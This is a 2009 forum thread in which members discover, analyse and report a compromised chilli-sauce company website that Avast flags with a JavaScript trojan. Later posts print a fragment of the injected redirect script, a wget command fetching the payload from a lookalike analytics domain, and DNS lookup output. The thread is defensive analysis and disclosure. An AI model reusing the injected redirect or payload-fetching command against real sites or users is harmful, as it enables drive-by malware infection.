|
![]() |
|
| Author |
|
|||||||
|
thermite
Posts: 2262
Location: Brisbane, Queensland
|
Anyone else get a trojan warning when they google "Chilli Willies"
Here is the link but don't click on it without Avast! Spoiler: http://www.google.com.au/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&hs=nyq&q=chilli+willies&btnG=Search&meta= |
|||||||
| #0 02:08pm 04/08/09 |
|
|||||||
|
system
|
--
|
|||||||
| #0 |
|
|||||||
|
Zylox
Posts: 1045
Location: Brisbane, Queensland
|
damn lucky i had avast on.
i dont think its safe to link like that man. DONT CLICK WITHOUT ANTIVIRUS! |
|||||||
| #1 02:06pm 04/08/09 |
|
|||||||
|
trog
AGN Admin
Posts: 27537
Location: Brisbane, Queensland
|
You get a trojan warning when you just google that thing? What AV are you using? What browser/OS? |
|||||||
| #2 02:11pm 04/08/09 |
|
|||||||
|
Zylox
Posts: 1046
Location: Brisbane, Queensland
|
yeah just from googling
|
|||||||
| #3 02:10pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 359
Location: Brisbane, Queensland
|
any details on the warning you got?
|
|||||||
| #4 02:11pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2263
Location: Brisbane, Queensland
|
avast! here
if this is a false positive I would be so pissed if I was the Chilli Willies man. (assuming there is such a man) If this is their fault it brings new meaning to their slogan "Be WARNED I may BITE back!". |
|||||||
| #5 02:13pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 360
Location: Brisbane, Queensland
|
You can get potential warnings from javascript in a link on the site. I also see there is a youtube preview linked on that page when I load it. There are a number of flash/SWF exploits rolling around at the moment, but I've not seen them come from youtube (which is where that video is from).
|
|||||||
| #6 02:13pm 04/08/09 |
|
|||||||
|
Zylox
Posts: 1047
Location: Brisbane, Queensland
|
Js: Cruiser-B [Trj]
Trojan |
|||||||
| #7 02:14pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2264
Location: Brisbane, Queensland
|
A trojan horse was found, yadda yadda yadda
Filename: http://www.chilliwillies.com.au/ Malware name: JS:Cruzer-B [Trj] Malware type: Trojan Horse VPS version: 090804-0, 04/08/2009 |
|||||||
| #8 02:16pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 361
Location: Brisbane, Queensland
|
Ok, its been compromised.
Looking into it now. wget the front page and after a chunk of whitespace is some appended javascript. Nice catch Avast! :P |
|||||||
| #9 02:20pm 04/08/09 |
|
|||||||
|
BillyHardball
Posts: 9537
Location: Brisbane, Queensland
|
Why would you google Chilli Willies? Is that some sort of gay restaurant or something?
|
|||||||
| #10 02:24pm 04/08/09 |
|
|||||||
|
trog
AGN Admin
Posts: 27538
Location: Brisbane, Queensland
|
Ok, its been compromised.weird, I don't see that after going to the page and saving it out as .html (from firefox) lemme know if I need to start panicking |
|||||||
| #11 02:30pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2265
Location: Brisbane, Queensland
|
Chilli Willies? Is that some sort of gay restaurant or something? Why don't you look at the site and find out? :D It's an australian company that makes chilli sauces, I was just enjoying splashing some on my kebab right now and thought I'd look up their site. |
|||||||
| #12 02:32pm 04/08/09 |
|
|||||||
|
Zylox
Posts: 1049
Location: Brisbane, Queensland
|
Ahh, yes I have their "Calypso Tropical Butt Burner" in the cupboard. Got it at the Chop Shop in the Coco's complex @ Annerley about 3 years ago.
|
|||||||
| #13 02:35pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 362
Location: Brisbane, Queensland
|
The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.
|
|||||||
| #14 02:51pm 04/08/09 |
|
|||||||
|
vbcoder
Posts: 158
Location: Townsville, Queensland
|
i clicked it and no virus warning
i dont have antivirus either |
|||||||
| #15 03:00pm 04/08/09 |
|
|||||||
|
trog
AGN Admin
Posts: 27539
Location: Brisbane, Queensland
|
The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.yeh wget was the first thing I tried, except weirdly (in windows anyway) wget'ing that URL gives me a 403 error. |
|||||||
| #16 03:02pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2266
Location: Brisbane, Queensland
|
funny story, reading the above post I didn't know you could wget in windows, so I googled wget in windows and on the first page is trog's website.
|
|||||||
| #17 03:26pm 04/08/09 |
|
|||||||
|
lewd
Posts: 175
Location: Brisbane, Queensland
|
i googled 'chilli willies'. there website was at the top of the search results. i clicked the link, went to there site........what next?
|
|||||||
| #18 03:51pm 04/08/09 |
|
|||||||
|
Clubby
Posts: 230
Location: Brisbane, Queensland
|
enter your credit card details :)
|
|||||||
| #19 03:58pm 04/08/09 |
|
|||||||
|
Spook
Posts: 25824
Location: Brisbane, Queensland
|
hot ranga > chilli willies
|
|||||||
| #20 04:33pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 363
Location: Brisbane, Queensland
|
Just finished decoding the javascript, and the link it went to is now dead. :(
It was redirecting to a dynamic downloader on http://www.google analitics ">.net/__utb.js?"+document.reerrer+"\"> but was broken in the script :] [parody@vps ~]$ wget "http://www.google analitics .net/__utb.js" -U="Internet Explorer 6.0" --16:35:57-- http://www.google analitics .net/__utb.js Resolving www.google analitics .net... 85.249.131.46 Connecting to www.google analitics .net|85.249.131.46|:80... and that connection times out. My personal shell has the IP cached. My work threatbox doesn't :( parody@threatbox:~$ nslookup www.google analitics .net Server: 4.2.2.1 Address: 4.2.2.1#53 Non-authoritative answer: Name: www.google analitics .net Address: 127.0.0.1 parody@threatbox:~$ If I wasn't so busy I could have caught the binary :( oh well. |
|||||||
| #21 04:39pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 364
Location: Brisbane, Queensland
|
Took too long to rebuild my spidermonkey install. Makes processing javascript so easy but new threatbox didn't have it installed. Very handy tool if you're into malware analysis. Mine is modded to include handling of document.write, eval() and alert() to external files. It still sucks for recursive code that needs to be decoded to fix the references to defines in the javascript. Have to cut and process in steps to figure that out and then build a big final script to process the lot.
http://blog.didierstevens.com/programs/spidermonkey/ this already has some modifications done to it which I based my further mods from. |
|||||||
| #22 04:50pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2267
Location: Brisbane, Queensland
|
just gonna write their details here while I've got the sauce bottle with me
Chilli Willies, 4 Cowley Dr, Flinders View, Q, 4305 07 3288 6228, 0419 646 305, info@chilliwillies.com.au might send an email or something later? last edited by thermite at 16:56:13 04/Aug/09 |
|||||||
| #23 04:56pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 365
Location: Brisbane, Queensland
|
I've just sent an email to the chilliwillies guys to inform them of the infection. Should hopefully get them fixed up quick. :]
|
|||||||
| #24 04:59pm 04/08/09 |
|
|||||||
|
thermite
Posts: 2268
Location: Brisbane, Queensland
|
Cool, well nerded. |
|||||||
| #25 05:29pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 366
Location: Brisbane, Queensland
|
Nerding? I do! :]
last edited by pARODY at 17:42:55 04/Aug/09 |
|||||||
| #26 05:42pm 04/08/09 |
|
|||||||
|
trog
AGN Admin
Posts: 27540
Location: Brisbane, Queensland
|
Just finished decoding the javascript, and the link it went to is now dead. :(Googling tells me its an attack thing that was around last year so I'm guessing its been long gone |
|||||||
| #27 05:59pm 04/08/09 |
|
|||||||
|
pARODY
Posts: 367
Location: Brisbane, Queensland
|
I just checked our known_malicious list and its a site that has been around since 2002 and changed owners a couple times but always involved in hosting dodgy stuff. Last activity on our list is from February.
|
|||||||
| #28 06:29pm 04/08/09 |
|
|||||||
|
HeardY
Gaelic newb
Posts: 16371
Location: Ireland
|
jesus there is plenty of nerding it up in this thread.
well played old chaps |
|||||||
| #29 07:39pm 04/08/09 |
|
|||||||
|
Fester
Posts: 1
Location: Queensland
|
Hi Chilli Willies here yes their was a trojan on my web site but this has been removed was a script on the tittle page, not much good all talking about and not telling me?? |
|||||||
| #30 11:49pm 22/08/09 |
|
|||||||
|
Fester
Posts: 2
Location: Queensland
|
Thank you for the was not sure who sent it as I get so much spam |
|||||||
| #31 11:52pm 22/08/09 |
|
|||||||
|
Fester
Posts: 3
Location: Queensland
|
I have owned Chilli Willies Sauces since 2001 and wonder what is so dogdy about hot sauce? |
|||||||
| #32 11:54pm 22/08/09 |
|
|||||||
|
Fester
Posts: 4
Location: Queensland
|
Chilli Willies here yes pissed off considering new nothing of the trojan |
|||||||
| #33 11:57pm 22/08/09 |
|
|||||||
|
thermite
Posts: 2420
Location: Brisbane, Queensland
|
well your poo feels like it's got razor blades in it
anyways I think he meant the website/host was dodgy, not the sauce |
|||||||
| #34 11:59pm 22/08/09 |
|
|||||||
|
Fester
Posts: 5
Location: Queensland
|
Web Host was Is Melbourne IT when I found out about the Trojan called them they confimed and they removed it for me straight away |
|||||||
| #35 12:08am 23/08/09 |
|
|||||||
|
system
|
--
|
|||||||
| #35 |
|
|||||||
|
| ||||||||